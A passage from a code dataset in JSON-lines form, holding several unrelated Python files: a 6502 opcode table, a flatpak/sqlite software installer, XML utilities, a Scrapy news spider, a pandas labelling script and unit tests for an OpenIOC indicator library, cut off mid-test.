OpCode(0x40, 'RTI', 1, 6, AddressingMode.NoneAddressing),\n # ---\n # /*(+1 if branch succeeds +2 if to a new page)*/\n OpCode(0xd0, 'BNE', 2, 2, AddressingMode.NoneAddressing),\n # /*(+1 if branch succeeds +2 if to a new page)*/\n OpCode(0x70, 'BVS', 2, 2, AddressingMode.NoneAddressing),\n # /*(+1 if branch succeeds +2 if to a new page)*/\n OpCode(0x50, 'BVC', 2, 2, AddressingMode.NoneAddressing),\n # /*(+1 if branch succeeds +2 if to a new page)*/\n OpCode(0x30, 'BMI', 2, 2, AddressingMode.NoneAddressing),\n # /*(+1 if branch succeeds +2 if to a new page)*/\n OpCode(0xf0, 'BEQ', 2, 2, AddressingMode.NoneAddressing),\n # /*(+1 if branch succeeds +2 if to a new page)*/\n OpCode(0xb0, 'BCS', 2, 2, AddressingMode.NoneAddressing),\n # /*(+1 if branch succeeds +2 if to a new page)*/\n OpCode(0x90, 'BCC', 2, 2, AddressingMode.NoneAddressing),\n # /*(+1 if branch succeeds +2 if to a new page)*/\n OpCode(0x10, 'BPL', 2, 2, AddressingMode.NoneAddressing),\n # ---\n OpCode(0x24, 'BIT', 2, 3, AddressingMode.ZeroPage),\n OpCode(0x2c, 'BIT', 3, 4, AddressingMode.Absolute),\n\n # --- Stores, Loads\n OpCode(0xa9, 'LDA', 2, 2, AddressingMode.Immediate),\n OpCode(0xa5, 'LDA', 2, 3, AddressingMode.ZeroPage),\n OpCode(0xb5, 'LDA', 2, 4, AddressingMode.ZeroPage_X),\n OpCode(0xad, 'LDA', 3, 4, AddressingMode.Absolute),\n # /*+1 if page crossed*/\n OpCode(0xbd, 'LDA', 3, 4, AddressingMode.Absolute_X),\n # /*+1 if page crossed*/\n OpCode(0xb9, 'LDA', 3, 4, AddressingMode.Absolute_Y),\n OpCode(0xa1, 'LDA', 2, 6, AddressingMode.Indirect_X),\n # /*+1 if page crossed*/\n OpCode(0xb1, 'LDA', 2, 5, AddressingMode.Indirect_Y),\n # ---\n OpCode(0xa2, 'LDX', 2, 2, AddressingMode.Immediate),\n OpCode(0xa6, 'LDX', 2, 3, AddressingMode.ZeroPage),\n OpCode(0xb6, 'LDX', 2, 4, AddressingMode.ZeroPage_Y),\n OpCode(0xae, 'LDX', 3, 4, AddressingMode.Absolute),\n # /*+1 if page crossed*/\n OpCode(0xbe, 'LDX', 3, 4, AddressingMode.Absolute_Y),\n # ---\n OpCode(0xa0, 'LDY', 2, 2, AddressingMode.Immediate),\n OpCode(0xa4, 'LDY', 2, 3, AddressingMode.ZeroPage),\n OpCode(0xb4, 'LDY', 2, 4, AddressingMode.ZeroPage_X),\n OpCode(0xac, 'LDY', 3, 4, AddressingMode.Absolute),\n # /*+1 if page crossed*/\n OpCode(0xbc, 'LDY', 3, 4, AddressingMode.Absolute_X),\n\n # ---\n OpCode(0x85, 'STA', 2, 3, AddressingMode.ZeroPage),\n OpCode(0x95, 'STA', 2, 4, AddressingMode.ZeroPage_X),\n OpCode(0x8d, 'STA', 3, 4, AddressingMode.Absolute),\n OpCode(0x9d, 'STA', 3, 5, AddressingMode.Absolute_X),\n OpCode(0x99, 'STA', 3, 5, AddressingMode.Absolute_Y),\n OpCode(0x81, 'STA', 2, 6, AddressingMode.Indirect_X),\n OpCode(0x91, 'STA', 2, 6, AddressingMode.Indirect_Y),\n # ---\n OpCode(0x86, 'STX', 2, 3, AddressingMode.ZeroPage),\n OpCode(0x96, 'STX', 2, 4, AddressingMode.ZeroPage_Y),\n OpCode(0x8e, 'STX', 3, 4, AddressingMode.Absolute),\n # ---\n OpCode(0x84, 'STY', 2, 3, AddressingMode.ZeroPage),\n OpCode(0x94, 'STY', 2, 4, AddressingMode.ZeroPage_X),\n OpCode(0x8c, 'STY', 3, 4, AddressingMode.Absolute),\n\n # --- Flags clear\n OpCode(0xD8, 'CLD', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0x58, 'CLI', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0xb8, 'CLV', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0x18, 'CLC', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0x38, 'SEC', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0x78, 'SEI', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0xf8, 'SED', 1, 2, AddressingMode.NoneAddressing),\n # ---\n OpCode(0xaa, 'TAX', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0xa8, 'TAY', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0xba, 'TSX', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0x8a, 'TXA', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0x9a, 'TXS', 1, 2, AddressingMode.NoneAddressing),\n OpCode(0x98, 'TYA', 1, 2, AddressingMode.NoneAddressing),\n\n # --- Stack\n OpCode(0x48, 'PHA', 1, 3, AddressingMode.NoneAddressing),\n OpCode(0x68, 'PLA', 1, 4, AddressingMode.NoneAddressing),\n OpCode(0x08, 'PHP', 1, 3, AddressingMode.NoneAddressing),\n OpCode(0x28, 'PLP', 1, 4, AddressingMode.NoneAddressing),\n]\n\nOPCODES_MAP = {}\nfor cpuop in CPU_OPS_CODES:\n OPCODES_MAP.update({cpuop.code: cpuop})\n\nif __name__ == '__main__':\n pass\n\n","sub_path":"ch5/src/opcodes.py","file_name":"opcodes.py","file_ext":"py","file_size_in_byte":10440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95217627","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport sqlite3\n\n\ndef installationflatpak():\n ''' Installation de logiciel via flatpak'''\n liste_flatpak = [\n \"com.slack.Slack\",\n \"com.spotify.Client\",\n \"org.signal.Signal\",\"org.telegram.desktop\",\n \"com.discordapp.Discord\",\n \"io.dbeaver.DBeaverCommunity\"\n\n ]\n for i in liste_flatpak:\n os.system(\"flatpak install flathub\"+i)\n\n\ndef installbase(installcmd):\n ''' Installation des logiciel de base'''\n conn = sqlite3.connect('db.sqlite')\n cursor = conn.cursor()\n sqlrequest= 'SELECT * FROM Software ORDER BY Logiciel'\n \n for row in cursor.execute(sqlrequest):\n os.system(installcmd+\" \"+row[0])\n \n\n\ndef ajouteindb(soft):\n '''permet d'ajouter un logiciel dans la db'''\n\n conn = sqlite3.connect('db.sqlite')\n cursor = conn.cursor()\n cursor.execute(\"\"\"INSERT INTO Software(Logiciel) VALUES(?);\"\"\", (soft,))\n conn.commit()\n cursor.close()\n\n\n\n\n\ndef supprimer(logiciel):\n '''Permet de supprimer un logiciel de la base de données'''\n conn = sqlite3.connect(\"db.sqlite\")\n cursor = conn.cursor()\n sqlrequest = \"DELETE FROM Software WHERE Logiciel = ?\"\n cursor.execute(sqlrequest, (logiciel,))\n conn.commit()\n conn.close()\n\n\ndef creadb():\n '''création de la base de donnée avec les différente tables et colone'''\n conn = sqlite3.connect('db.sqlite')\n cursor = conn.cursor()\n cursor.execute(\"\"\"\nCREATE TABLE IF NOT EXISTS Software(\n Logiciel TEXT)\n\"\"\")\n\n conn.commit()\n conn.close()\n\n\ndef showcontent():\n \"\"\"affiche ce qu'il y a dans la base de données\"\"\"\n conn = sqlite3.connect('db.sqlite')\n cursor = conn.cursor()\n sqlrequest = \"SELECT * FROM Software ORDER BY Logiciel\"\n for row in cursor.execute(sqlrequest):\n print(row)\n\n\n\ndef install_zsh():\n os.system(\"./install_zsh\")\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"543678587","text":"\"\"\" xml_util.py -- XML utility functions \"\"\"\nfrom xml.etree import ElementTree as ET\n\nfrom ascii import *\nfrom tl_logger import TLLog\n\nlog = TLLog.getLogger(\"xml_util\")\n\n\ndef boolValue(data):\n \"\"\" if input is string is 'on','true','yes' or non-zero number then return True \"\"\"\n b = False\n if data is not None:\n if data.isdigit():\n i = int(data)\n if i != 0:\n b = True\n else:\n data = data.lower()\n if data in [\"yes\", \"true\", \"on\"]:\n b = True\n return b\n\n\nclass XMLReceiveQueue:\n \"\"\" Process all XML messages. \"\"\"\n\n def __init__(self, lstTags):\n self.lstCompTags = lstTags\n if len(self.lstCompTags) == 0:\n log.error(\n \"XMLReceiveQueue lstCompTags is empty -- NO XML ELEMENTS WILL BE PROCESSED\"\n )\n self.xmlData = \"\"\n self.stkTags = []\n self.stateFunc = self._waitForFirstStartTag\n\n def parseXMLMessage(self, xmlData):\n \"\"\" overload to convert completed XML message into specific object for queue \"\"\"\n log.error(\"parseXMLMessage() not overloaded -- ALL XML DATA IS IGNORED\")\n\n def processData(self, binData):\n \"\"\" process the received data \"\"\"\n log.debug(\"processData - binData size=%d\" % len(binData))\n for ch in binData:\n self.stateFunc(ch)\n\n def _waitForFirstStartTag(self, ch):\n log.debug(\"_waitForFirstStartTag() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n if ch == \"<\":\n self.stateFunc = self._waitForStartTagName\n self.xmlData = ch\n\n def _waitForStartTag(self, ch):\n log.debug(\"_waitForStartTag() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n self.xmlData += ch\n if ch == \"<\":\n self.stateFunc = self._waitForStartTagName\n\n def _waitForStartTagName(self, ch):\n log.debug(\"_waitForStartTagName() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n self.xmlData += ch\n if isalpha(ch):\n self.stateFunc = self._waitForStartTagNameFinish\n self.startTag = ch\n elif ch == \"/\":\n self.stateFunc = self._waitForEndTagName\n\n def _waitForStartTagNameFinish(self, ch):\n log.debug(\"_waitForStartTagNameFinish() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n self.xmlData += ch\n if isspace(ch):\n self.stateFunc = self._waitForStartTagClose\n elif ch == \">\":\n log.debug(\"startTag:%s\" % self.startTag)\n self.stkTags.append(self.startTag)\n self.stateFunc = self._waitForStartTag\n else:\n self.startTag += ch\n\n def _waitForStartTagClose(self, ch):\n log.debug(\"_waitForStartTagClose() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n self.xmlData += ch\n if ch == \">\":\n if self.xmlData[-2] == \"/\":\n log.debug(\"startTag / close:%s\" % self.startTag)\n if self.startTag in self.lstCompTags:\n self._completeXML()\n else:\n log.debug(\"startTag:%s\" % self.startTag)\n self.stkTags.append(self.startTag)\n self.stateFunc = self._waitForStartTag\n\n def _waitForEndTagClose(self, ch):\n log.debug(\"_waitForEndTagClose() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n self.xmlData += ch\n if ch == \"/\":\n self.stateFunc = self._waitForEndTagName\n elif not isspace(ch):\n self.stateFunc = self._waitForEndTag\n\n def _waitForEndTagName(self, ch):\n log.debug(\"_waitForEndTagName() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n self.xmlData += ch\n if isalpha(ch):\n self.stateFunc = self._waitForEndTagNameFinish\n self.endTag = ch\n\n def _waitForEndTagNameFinish(self, ch):\n log.debug(\"_waitForEndTagNameFinish() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n self.xmlData += ch\n if isspace(ch) or ch == \">\":\n log.debug(\"endTag:%s pop:%s\" % (self.endTag, self.stkTags.pop()))\n if ch == \">\":\n self.stateFunc = self._waitForStartTag\n if self.endTag in self.lstCompTags:\n self._completeXML()\n else:\n self.stateFunc = self._waitForEndTagClose\n else:\n self.endTag += ch\n\n def _waitForEndTagNameClose(self, ch):\n log.debug(\"_waitForEndTagNameClose() - ch=%c 0x%02.x\" % (ch, ord(ch)))\n self.xmlData += ch\n if ch == \">\":\n self.stateFunc = self._waitForStartTag\n if self.endTag in self.lstCompTags:\n self._completeXML()\n\n def _completeXML(self):\n log.debug(\"_completeXML() XML={%s}\" % self.xmlData)\n self.parseXMLMessage(self.xmlData)\n self.xmlData = \"\"\n self.stateFunc = self._waitForFirstStartTag\n\n\nclass BaseXML:\n \"\"\" base class for XML objects \"\"\"\n\n def __init__(self, tagName, dctEle=None, dctXML=None, xmlData=None):\n self.tagName = tagName\n self.xmlData = xmlData\n self.dctEle = {}\n self.dctXML = {}\n if dctEle is not None:\n self.dctEle = dctEle\n if dctXML is not None:\n self.dctXML = dctXML\n self.initialize()\n\n def initialize(self):\n if self.dctEle:\n for element in self.dctEle.keys():\n setattr(self, element, None)\n\n def parseXML(self, eleRoot):\n for ele in eleRoot:\n if self.dctEle and ele.tag in self.dctEle:\n setattr(self, ele.tag, self.dctEle[ele.tag](ele.text))\n elif self.dctXML and ele.tag in self.dctXML:\n eventFunc = self.dctXML[ele.tag]\n if eventFunc is None:\n x = ele.tag\n else:\n x = eventFunc()\n x.parseXML(ele)\n setattr(self, ele.tag, x)\n\n def toXMLString(self):\n s = \"<%s>\" % self.tagName\n for element in self.dctEle.keys():\n value = getattr(self, element)\n if value is not None:\n s += \"<%s>%s\" % (element, value, element)\n for element in self.dctXML.keys():\n if hasattr(self, element):\n value = getattr(self, element)\n if value is not None:\n s += value.toXMLString()\n s += \"\" % self.tagName\n return s\n\n def toXML(self):\n xmlRoot = ET.Element(self.tagName)\n for element in self.dctEle.keys():\n value = getattr(self, element)\n if value is not None:\n x = ET.SubElement(xmlRoot, element)\n x.text = str(value)\n for element in self.dctXML.keys():\n if hasattr(self, element):\n value = getattr(self, element)\n if value is not None:\n ele = value.toXML()\n xmlRoot.append(ele)\n return xmlRoot\n\n def __str__(self):\n s = \"%-6s -\" % self.tagName\n for element in self.dctEle.keys():\n s += \" %s:%s\" % (element, getattr(self, element))\n return s\n\n\nlstXMLSpecialChars = [\n (\"&\", \"&\"), # must be first\n (\"<\", \"<\"),\n (\">\", \">\"),\n (\"'\", \"&apos\"),\n ('\"', \""\"),\n]\n\n\ndef xmlReplaceEscapeChars(text):\n \"\"\" replace all special characters in XML \"\"\"\n for tup in lstXMLSpecialChars:\n text = text.replace(tup[0], tup[1])\n return text\n\n\nXML_INDENT = \" \"\n\n\ndef xmlString(eleRoot, level=0):\n \"\"\" Create a string of XML element \"\"\"\n\n s = level * XML_INDENT + \"<%s\" % eleRoot.tag\n # attributes\n for name, value in eleRoot.items():\n s += ' %s=\"%s\"' % (name, xmlReplaceEscapeChars(value))\n if len(eleRoot):\n # nested elements\n s += \">\\n\"\n for ele in eleRoot:\n s += xmlString(ele, level + 1)\n s += level * XML_INDENT + \"\\n\" % eleRoot.tag\n else:\n # simple element\n if eleRoot.text:\n s += \">\" + xmlReplaceEscapeChars(eleRoot.text) + \"\\n\" % eleRoot.tag\n else:\n s += \" />\\n\"\n return s\n\n\nif __name__ == \"__main__\":\n print(\"xml_util tests\")\n lstXML = [\n \"\",\n \"Data\",\n \"\",\n \" Data \",\n \"Data\",\n \"Data < 5\",\n ]\n for xml in lstXML:\n print(\"XML:%s\" % xml)\n ele = ET.XML(xml)\n print(xmlString(ele))\n","sub_path":"util/xml_util.py","file_name":"xml_util.py","file_ext":"py","file_size_in_byte":8436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"467989839","text":"import scrapy\nimport os\n\nclass ToiSpider(scrapy.Spider):\n name = \"toi\"\n start_urls = [\n \"http://timesofindia.indiatimes.com/tech/\"\n ]\n \n #typical url 'http://timesofindia.indiatimes.com/tech/tech-news/title/articleshow/47827034.cms'\n def parse_callback(self, response):\n try:\n title, category = response.url.split(\"/\")[-3], response.url.split(\"/\")[-5]\n filename = 'crawled/' + category + '/' + title + '.html'\n title = response.xpath('//span[@class = \"arttle\"]/h1/text()').extract()[0]\n image = response.xpath('//div[@class = \"mainimg1\"]//img/@src').extract()[0]\n content = \"\\n\".join(response.xpath('//div[@class = \"Normal\"]/text()').extract()) \n except:\n return\n with open(filename, 'w') as f:\n f.write(title +\"\\n\\n\"+ image+\"\\n\\n\"+content)\n\n\n def parse(self, response):\n links = []\n #crawled/tech or crawled/politics \n directory = 'crawled/' + response.url.split(\"/\")[-1]\n if not os.path.exists( directory):\n os.makedirs(directory)\n\n for href in response.xpath('//@href').extract():\n #if base url there in href\n if response.url in href:\n if href.split('?')[0] not in links:\n links.append(href)\n yield scrapy.Request(href, callback=self.parse_callback)\n\n with open('links','w') as f:\n f.write(\"\\n\".join(links))\n","sub_path":"newscrawler/toi/toi/spiders/toispider.py","file_name":"toispider.py","file_ext":"py","file_size_in_byte":1488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"614122893","text":"\nimport pandas as pd\nfrom pathlib import Path\nfrom concurrent.futures import ProcessPoolExecutor as PPE\n\ndef pmap(arg):\n path = arg\n print(path)\n \n df = pd.read_csv(path)\n df = df[pd.notnull(df['性別'])]\n #df['time'] = pd.to_datetime(df['time'])\n #lower = pd.to_datetime('2019-01-01')\n df['label'] = df['性別'].apply(lambda x:1 if x == '女性' else 0)\n df.to_csv(str(path).replace('/A/', '/B_gender/'), index=None)\nargs = [path for path in Path().glob('tmp/A/*.csv')]\nPath('tmp/B_gender').mkdir(exist_ok=True, parents=True)\n#[pmap(arg) for arg in args]\nwith PPE(max_workers=8) as exe:\n exe.map(pmap, args)\n","sub_path":"B002_make_label_gender.py","file_name":"B002_make_label_gender.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"499332657","text":"\"\"\"\ntests.py from ioc_writer\nCreated: 12/3/15\n\nPurpose:\n\nExamples:\n\nUsage:\n\n\"\"\"\n# Stdlib\nfrom __future__ import print_function\nimport logging\nimport os\nimport unittest\n# Third Party code\nfrom lxml import etree as et\n# Custom Code\nimport ioc_writer.ioc_api as ioc_api\nimport ioc_writer.ioc_et as ioc_et\nimport ioc_writer.managers as managers\nimport ioc_writer.managers.downgrade_11 as downgrade_11\n\n\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(levelname)s %(message)s [%(filename)s:%(funcName)s]')\nlog = logging.getLogger(__name__)\n\n\nOPENIOC_11_ASSETS = os.path.join(os.path.split(__file__)[0], 'assets/openioc_11_assets')\n\n\nclass TestIocEt(unittest.TestCase):\n def setUp(self):\n self.author = 'unittest'\n self.content_text = 'foobar.exe'\n self.content_type = 'string'\n self.context_document = 'FileItem'\n self.context_search = 'FileItem/Md5sum'\n self.context_type = 'testType'\n self.description = 'Test description'\n self.iocid = '1234'\n self.keywords = 'Foo Bar Baz'\n self.links = [('testRel', None, 'testValue'),\n ('testRel2', 'https://www.fireeye.com', 'testValue2',)]\n self.name = 'Test name'\n self.params = [{'nid': '1234-5678',\n 'content': 'I am a string!'},\n {'nid': '1234-9abc',\n 'content': 'I am a string!',\n 'name': 'comment',\n 'ptype': 'string'},\n {'nid': '1234-def0',\n 'content': 'true',\n 'name': 'some_value',\n 'ptype': 'bool'},\n ]\n\n def test_make_criteria_node(self):\n r = ioc_et.make_criteria_node()\n self.assertEqual(r.tag, 'criteria')\n\n def test_make_criteria_node_invalid(self):\n bad_node = et.Element('BadNode')\n with self.assertRaises(ValueError):\n r = ioc_et.make_criteria_node(indicator_node=bad_node)\n\n def test_make_content_node(self):\n r = ioc_et.make_content_node(ctype=self.content_type,\n content=self.content_text)\n self.assertEqual(r.tag, 'Content')\n self.assertEqual(r.text, self.content_text)\n self.assertEqual(r.attrib.get('type'), self.content_type)\n\n def test_make_context_node(self):\n r = ioc_et.make_context_node(document=self.context_document, search=self.context_search)\n self.assertEqual(r.tag, 'Context')\n self.assertEqual(r.text, None)\n self.assertEqual(r.attrib.get('document'), self.context_document)\n self.assertEqual(r.attrib.get('search'), self.context_search)\n self.assertEqual(r.attrib.get('type'), 'mir')\n\n def test_make_context_node_param(self):\n r = ioc_et.make_context_node(document=self.context_document, search=self.context_search,\n context_type=self.context_type)\n self.assertEqual(r.tag, 'Context')\n self.assertEqual(r.text, None)\n self.assertEqual(r.attrib.get('document'), self.context_document)\n self.assertEqual(r.attrib.get('search'), self.context_search)\n self.assertEqual(r.attrib.get('type'), self.context_type)\n\n def test_make_parameters_node(self):\n r = ioc_et.make_parameters_node()\n self.assertEqual(r.tag, 'parameters')\n\n def test_make_parm_node(self):\n for param in self.params:\n r = ioc_et.make_param_node(**param)\n self.assertEqual(r.tag, 'param')\n self.assertEqual(len(r.getchildren()), 1)\n vnode = r.getchildren()[0]\n self.assertEqual(vnode.tag, 'value')\n self.assertIn('id', r.attrib)\n self.assertEqual(r.attrib.get('ref-id'), param.get('nid'))\n self.assertEqual(vnode.text, param.get('content'))\n if 'name' in param:\n self.assertEqual(r.attrib.get('name'), param.get('name'))\n else:\n self.assertEqual(r.attrib.get('name'), 'comment')\n if 'ptype' in param:\n self.assertEqual(vnode.attrib.get('type'), param.get('ptype'))\n else:\n self.assertEqual(vnode.attrib.get('type'), 'string')\n\n def test_make_link_node(self):\n rel, href, value = self.links[0]\n r = ioc_et.make_link_node(rel, value, href)\n self.assertEqual(r.tag, 'link')\n self.assertEqual(r.attrib.get('rel'), rel)\n self.assertEqual(r.attrib.get('href'), href)\n self.assertEqual(r.text, value)\n\n rel2, href2, value2 = self.links[1]\n r2 = ioc_et.make_link_node(rel2, value2, href2)\n self.assertEqual(r2.tag, 'link')\n self.assertEqual(r2.attrib.get('rel'), rel2)\n self.assertEqual(r2.attrib.get('href'), href2)\n self.assertEqual(r2.text, value2)\n\n def test_make_links_node(self):\n r = ioc_et.make_links_node(self.links)\n self.assertEqual(r.tag, 'links')\n for i, link in enumerate(r.getchildren()):\n self.assertEqual(link.tag, 'link')\n rel, href, value = self.links[i]\n self.assertEqual(link.attrib['rel'], rel)\n self.assertEqual(link.attrib.get('href'), href)\n self.assertEqual(link.text, value)\n\n def test_make_authored_date_node(self):\n r = ioc_et.make_authored_date_node()\n self.assertEqual(r.tag, 'authored_date')\n\n def test_make_authored_by_node(self):\n r = ioc_et.make_authored_by_node()\n self.assertEqual(r.tag, 'authored_by')\n self.assertEqual(r.text, 'ioc_et')\n r2 = ioc_et.make_authored_by_node(author=self.author)\n self.assertEqual(r2.text, self.author)\n\n def test_make_description_node(self):\n r = ioc_et.make_description_node(self.description)\n self.assertEqual(r.tag, 'description')\n self.assertEqual(r.text, self.description)\n\n def test_make_short_description_node(self):\n r = ioc_et.make_short_description_node(self.name)\n self.assertEqual(r.tag, 'short_description')\n self.assertEqual(r.text, self.name)\n\n def test_make_keywords_node(self):\n r = ioc_et.make_keywords_node()\n self.assertEqual(r.tag, 'keywords')\n self.assertEqual(r.text, None)\n r2 = ioc_et.make_keywords_node(keywords=self.keywords)\n self.assertEqual(r2.text, self.keywords)\n\n def test_make_ioc_root(self):\n r = ioc_et.make_ioc_root()\n self.assertEqual(r.tag, 'OpenIOC')\n required_attribs = ['id', 'last-modified', 'published-date', 'xmlns']\n for attribute in required_attribs:\n self.assertIn(attribute, r.attrib)\n\n def test_make_ioc_root_provided_id(self):\n r = ioc_et.make_ioc_root(iocid=self.iocid)\n self.assertEqual(r.attrib['id'], self.iocid)\n\n def test_make_metadata_node(self):\n r = ioc_et.make_metadata_node()\n self.assertEqual(r.tag, 'metadata')\n child_note_tags = ['short_description',\n 'description',\n 'keywords',\n 'authored_by',\n 'authored_date',\n 'links']\n for tag in child_note_tags:\n n = r.find(tag)\n self.assertTrue(n is not None)\n self.assertEqual(n.tag, tag)\n\n def test_make_metadata_node_provided_data(self):\n r = ioc_et.make_metadata_node(name=self.name,\n description=self.description,\n author=self.author,\n links=self.links)\n self.assertEqual(r.find('description').text, self.description)\n self.assertEqual(r.find('short_description').text, self.name)\n self.assertEqual(r.find('authored_by').text, self.author)\n links = r.find('links')\n for i, link in enumerate(links.getchildren()):\n rel, href, value = self.links[i]\n self.assertEqual(link.attrib['rel'], rel)\n self.assertEqual(link.attrib.get('href'), href)\n self.assertEqual(link.text, value)\n\n\nclass TestIOCApi(unittest.TestCase):\n def setUp(self):\n self.author = 'unittest'\n self.content_text = 'foobar.exe'\n self.content_type = 'string'\n self.context_document = 'FileItem'\n self.context_search = 'FileItem/Md5sum'\n self.context_type = 'testType'\n self.description = 'Test description'\n self.iocid = '1234'\n self.keywords = 'Foo Bar Baz'\n self.links = [('testRel', None, 'testValue'),\n ('testRel2', 'https://www.fireeye.com', 'testValue2',)]\n self.name = 'Test name'\n self.params = [{'nid': '1234-5678',\n 'content': 'I am a string!'},\n {'nid': '1234-9abc',\n 'content': 'I am a string!',\n 'name': 'comment',\n 'ptype': 'string'},\n {'nid': '1234-def0',\n 'content': 'true',\n 'name': 'some_value',\n 'ptype': 'bool'},\n ]\n\n def test_ioc_class_creation_blank(self):\n ioc_obj = ioc_api.IOC()\n self.assertEqual(ioc_obj.metadata.findtext('authored_by'), 'IOC_api')\n self.assertEqual(ioc_obj.metadata.findtext('description'), 'Automatically generated IOC')\n self.assertEqual(ioc_obj.metadata.findtext('short_description'), '')\n self.assertEqual(ioc_obj.metadata.findtext('keywords'), '')\n self.assertEqual(len(ioc_obj.metadata.find('links').getchildren()), 0)\n\n def test_ioc_class_creation_provided_params(self):\n ioc_obj = ioc_api.IOC(name=self.name,\n description=self.description,\n author=self.author,\n links=self.links,\n keywords=self.keywords,\n iocid=self.iocid)\n self.assertEqual(ioc_obj.metadata.findtext('authored_by'), self.author)\n self.assertEqual(ioc_obj.metadata.findtext('description'), self.description)\n self.assertEqual(ioc_obj.metadata.findtext('short_description'), self.name)\n self.assertEqual(ioc_obj.metadata.findtext('keywords'), self.keywords)\n self.assertEqual(len(ioc_obj.metadata.find('links').getchildren()), 2)\n\n def test_ioc_class_creation_file(self):\n iocid = '378f0cce-b8df-41d5-8189-3d7ec102e52f'\n fn = '{}.ioc'.format(iocid)\n fp = os.path.join(OPENIOC_11_ASSETS, fn)\n ioc_obj = ioc_api.IOC(fp)\n self.assertEqual(ioc_obj.iocid, iocid)\n self.assertEqual(len(ioc_obj.top_level_indicator.getchildren()), 7)\n\n\nclass TestIOCAPIFuncs(unittest.TestCase):\n def setUp(self):\n self.nid = '1234'\n self.operators = ['AND', 'OR', 'and', 'or']\n self.conditions = ['is',\n 'contains',\n 'matches',\n 'starts-with',\n 'ends-with',\n 'greater-than',\n 'less-than']\n self.context_document = 'FileItem'\n self.context_search = 'FileItem/Md5sum'\n self.context_type = 'testType'\n self.content = '5678'\n self.content_type = 'int'\n\n def test_make_i_node(self):\n for op in self.operators:\n inode = ioc_api.make_indicator_node(op)\n self.assertEqual(inode.get('operator'), op.upper())\n self.assertNotEqual(inode.get('id'), self.nid)\n inode = ioc_api.make_indicator_node(op, nid=self.nid)\n self.assertEqual(inode.get('operator'), op.upper())\n self.assertEqual(inode.get('id'), self.nid)\n\n def test_make_i_node_bad(self):\n op = 'FooBar'\n with self.assertRaises(ValueError):\n inode = ioc_api.make_indicator_node(op)\n\n def test_make_ii_node(self):\n for condition in self.conditions:\n ii_node = ioc_api.make_indicatoritem_node(condition=condition,\n document=self.context_document,\n search=self.context_search,\n content_type=self.content_type,\n content=self.content)\n self.assertEqual(ii_node.get('condition'), condition)\n self.assertEqual(ii_node.get('preserve-case'), 'false')\n self.assertEqual(ii_node.get('negate'), 'false')\n self.assertEqual(ii_node.findtext('Content'), self.content)\n self.assertEqual(ii_node.find('Content').get('type'), self.content_type)\n self.assertEqual(ii_node.find('Context').get('document'), self.context_document)\n self.assertEqual(ii_node.find('Context').get('search'), self.context_search)\n self.assertEqual(ii_node.find('Context').get('type'), 'mir') # Default value\n\n ii_node = ioc_api.make_indicatoritem_node(condition='is',\n document=self.context_document,\n search=self.context_search,\n content_type=self.content_type,\n content=self.content,\n context_type='notMir',\n nid=self.nid)\n self.assertEqual(ii_node.find('Context').get('type'), 'notMir')\n self.assertEqual(ii_node.get('id'), self.nid)\n\n for preserve_case in [True, False]:\n for negate in [True, False]:\n ii_node = ioc_api.make_indicatoritem_node(condition='is',\n document=self.context_document,\n search=self.context_search,\n content_type=self.content_type,\n content=self.content,\n preserve_case=preserve_case,\n negate=negate)\n self.assertEqual(ii_node.get('preserve-case'), 'true' if preserve_case else 'false')\n self.assertEqual(ii_node.get('negate'), 'true' if negate else 'false')\n\n def test_make_ii_node_bad_condition(self):\n with self.assertRaises(ValueError) as cm:\n ii_node = ioc_api.make_indicatoritem_node(condition='foobarbaz',\n document=self.context_document,\n search=self.context_search,\n content_type=self.content_type,\n content=self.content)\n\n\nclass IOCTestManager(managers.IOCManager):\n \"\"\"\n Test class for testing the parser callback functionality.\n \"\"\"\n def __init__(self):\n managers.IOCManager.__init__(self)\n self.child_count = {}\n self.register_parser_callback(self.parse_callback)\n\n def parse_callback(self, ioc_obj):\n c = ioc_obj.top_level_indicator.getchildren()\n self.child_count[ioc_obj.iocid] = len(c)\n\n\nclass TestIOCManager(unittest.TestCase):\n def setUp(self):\n self.iocm = managers.IOCManager()\n self.test_iocm = IOCTestManager()\n\n\n def test_iocm(self):\n iocids = {'378f0cce-b8df-41d5-8189-3d7ec102e52f',\n '55075e99-273a-4b81-b92b-672be6666474',\n 'c158ef8c-e664-43c5-b71d-3488a3325fcb'}\n self.iocm.insert(OPENIOC_11_ASSETS)\n self.assertEqual(len(self.iocm), 3)\n self.assertEqual(set(self.iocm.iocs.keys()), iocids)\n\n def test_custom_iocm(self):\n expected_dict = {'378f0cce-b8df-41d5-8189-3d7ec102e52f': 7,\n '55075e99-273a-4b81-b92b-672be6666474': 1,\n 'c158ef8c-e664-43c5-b71d-3488a3325fcb': 2}\n self.test_iocm.insert(OPENIOC_11_ASSETS)\n self.assertDictEqual(self.test_iocm.child_count, expected_dict)\n\n def test_custom_iocm_fail(self):\n with self.assertRaises(TypeError):\n self.test_iocm.register_parser_callback('1234')\n\n\nclass TestDowngrade(unittest.TestCase):\n def setUp(self):\n self.iocm = 